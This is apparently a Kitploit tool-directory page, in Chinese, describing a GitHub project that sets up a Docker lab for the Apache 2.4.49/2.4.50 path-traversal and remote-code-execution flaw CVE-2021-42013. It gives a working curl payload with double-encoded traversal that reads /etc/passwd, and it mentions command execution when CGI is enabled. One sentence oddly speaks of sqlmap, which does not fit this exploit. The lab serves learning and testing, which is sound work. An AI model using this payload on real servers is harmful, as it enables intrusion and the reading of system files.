Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 测试于:2.4.49 和 2.4.50 描述:Apache 2.4.49 和 2.4.50 中的路径遍历或远程代码执行漏洞 | Kitploit
工具/GitHubGitHub/cybfar/cve-2021-42013-httpd
容器安全漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 测试于:2.4.49 和 2.4.50 描述:Apache 2.4.49 和 2.4.50 中的路径遍历或远程代码执行漏洞

查看仓库
1133年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞的 Docker 化:cve-2021-42013

本项目旨在使用 Docker 容器化特定漏洞。其目标是创建一个隔离环境,在此环境中可以安全地利用和测试该漏洞。

易受攻击的应用程序

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

安装

要运行此项目,您的机器上必须安装:

  • Docker
  • Python
  • Curl

安装好前置依赖后,您可以克隆此 Git 仓库到您的机器上:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

进入该目录后,运行以下命令来搭建易受攻击的环境:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

然后通过地址 http://localhost:8000 访问该应用程序。 如果一切正常,您应该会看到显示 "It works"。

漏洞利用

下面使用 curl 执行此 payload 表明目标存在漏洞。该脚本将生成适当的 sqlmap 命令来利用此漏洞。

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

此 payload 可在未经用户同意的情况下直接访问系统中与用户相关的信息。

一旦我们在服务器上启用 cgi 或 cgid 模块,此漏洞将允许攻击者执行任意命令。

下载工具